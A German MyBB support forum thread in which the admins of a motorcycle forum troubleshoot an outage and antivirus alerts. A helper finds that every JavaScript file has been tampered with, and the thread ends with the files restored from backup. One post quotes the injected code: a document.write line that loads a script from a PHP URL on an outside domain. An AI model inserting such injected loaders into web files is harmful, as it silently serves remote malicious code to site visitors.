Hallo, Gast! (Registrieren)

Letzte Ankündigung: MyBB 1.8.20 veröffentlicht (27.02.19)


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
Forum funktioniert nicht mehr
#1
Thumbsdown 
Hi,

von gestern auf Heute ist mein Forum nicht mehr erreichbar:
http://www.z750twin.de/zforum/index.php
Kommt Fehler Webseite nicht verfügbar http 500

Auch ins Admin-Menü komme ich nicht mehr.
Jetzt wollte ich mit mysqladmin mal schauen, kommt auch nur die Fehlermeldung.

Habe jetzt mal einen php Test Datei angelegt, da scheint alles in Ordnung.
http://www.z750twin.de/zforum/php.php

Die einzige Idee die ich jetzt noch habe ist, dass die Datenbank nicht läuft, oder was könnte es sonst noch sein.

Bin leider nicht der Webmaster Nur Forenadmin) daher habe ich keinen Zugriff auf das Portal des Providers. Was könnte ich noch testen um den Fehler einzugrenzen?
Gruß Werner
#2
(26.11.2013, 11:09)wernerz schrieb: Jetzt wollte ich mit mysqladmin mal schauen, kommt auch nur die Fehlermeldung.
Dann liegt es schon einmal nicht am MyBB, bitte wende dich an deinen Hoster. Wink
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
#3
Ich habe irgendwo gelesen das bei Strato error.log Dateien die 30MB überschreiten solche Fehler verursachen können. Schau mal danach.
Gruß NetHunter
#4
Oft werden diese Fehler auch durch falsche Einträge in der .htaccess verursacht. Wink
MfG Sven
#5
Moin Männer,

ich bin der Webmaster der von wernerz angesprochenen Website.
Was das Programmieren angeht, bin ich wahrscheinlich der DAW, der dümmste anzunehmende Webmaster ;-)
Ich nutze Frontpage 2003 auf einem WinXP-Rechner und WSFTP95 für den Upload.
Die Website unterhalte ich mittlerweile seit dem Jahre 2001, wernerz und das Forum kamen ein paar Jahre später dazu ;-)

Die index.php-Datei wurde kürzlich verändert, ohne das er oder ich darauf zugegriffen oder eine neue Version upgeloadet haben. Der Support von Strato konnte mir telefonisch sofort helfen und hat auf diese veränderte Datei hingewiesen.

Aus einem Backup habe ich eine zwei Tage ältere index.php Seite gezogen und upgeloaded. Seitdem funktioniert das Forum als solches wieder ;-)
Lesen, schreiben, alles geht wieder.

Leider dreht mein avast-Antivirus völlig durch, sobald ich ein Thema oder einen Beitrag anklicke oder ein neues Thema eröffne.

Im Anhang mal der Screenshot einer Warnmeldung:
   
Es gibt noch mehr Warnmeldungen.
Alle beziehen sich auf Dateien mit der Endung .js?ver=1400 bzw. .js?ver=1600

Was könnte die Ursache sein ?

Eine error.log-Datei habe ich im umfangreichen Dateiverzeichnis im Forum-Ordner auf dem Server nicht gefunden.
Wo sollte die zu finden sein?

Die .htaccess wurde im fraglichen Zeitraum nicht verändert, daher möchte ich das erstmal als Fehlerursache ausschließen.

LG, Michael
#6
(28.11.2013, 21:54)mschumac schrieb: Was könnte die Ursache sein ?
Vermutlich wurden diese oder sogar noch mehr Dateien auch manipuliert.

Eine error.log gehört nicht zum Forum, vermutlich wurde meint NetHunter die Log-Datei des Hosters. Wo man die bei Strato findet, weiß ich allerdings nicht.
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
#7
In Deinen js-Dateien stehen am Ende jeweils Zeilen dieser Art
Code:
/*8066e9*/
document.write('<script src="http://www.krankengymnastik-asperg.de/web-settings/YJJVTg3U.php?id=59420994" type="text/javascript"></script>');
/*/8066e9*/
Die stammen keinesfalls von MyBB.
viele Grüße
Jockl
übersetzte und eigene Plugins
#8
Moin Männer,
das ging ja wirklich fix, vielen Dank !!!

Es sind alle .js-Dateien geändert worden, siehe Screenshot von WSFTP95:
   

Leider kann ich diese Dateien weder downloaden noch direkt am Server öffnen, der Avast schützt mich davor :-O

Wenn ich die nicht veränderten Dateien in einem Backup finde, kann ich dann die im Screenshot zu sehenden Dateien vom Server löschen und durch die Backup-Versionen ersetzen?

LG, Michael
#9
Warum verwendest Du nicht die Dateien aus den Original MyBB Paketen?
viele Grüße
Jockl
übersetzte und eigene Plugins
#10
Hi Jockl,

diese Frage kann dir nur wernerz beantworten, der ist aber gerade unterwegs.
Wir haben eine Art Aufgabenteilung eingerichtet.
Ich kümmere mich um den öffentlichen Teil der Website, er sich um das Forum.

Ich habe in einem aktuellen Backup (2 Tage vor den Problemen) die älteren, wahrscheinlich funktionierenden Scripte gefunden.
Was hältst du von der Idee die wieder upzuloaden und die offensichtlich korrupten Scripte vom Server zu ersetzen?

Wie sollte die Einbindung der originalen Scripte aus MyBB aussehen?

LG, Michael

Hi all,

ich habe es nicht mehr ausgehalten und schon mal die alten .js-Dateien wieder upgeloaded.
Jetzt geht das Forum wieder ohne Eingriffe des Avast Antivirus ;-) Hurra !!!

Allerdings funktioniert das "editieren/bearbeiten" von Posts nicht mehr.
Weder bei meinen eigenen Posts noch bei anderen Posts.
Dieses Zugriffsrecht hatte ich als Webmaster zuvor, offensichtliche Rechtschreibfehler sind mir ein Greuel und benötigen Nacharbeit :-)))
Naja, reboot tut gut !

Freue mich über weiteren Input zur optimalen Nutzung des Forums über MyBB ;-)

Vielen Dank und für heute schon mal eine Gute Nacht !
Michael


Möglicherweise verwandte Themen...
Thema Verfasser Antworten Ansichten Letzter Beitrag
Lightning Forum funktioniert nicht mehr unter PHP 5.4 Paccy 9 4.263 25.03.2014, 07:51
Letzter Beitrag: Paccy
  Forum funktioniert während upgrade nicht mehr moro 3 1.287 26.02.2011, 11:59
Letzter Beitrag: moro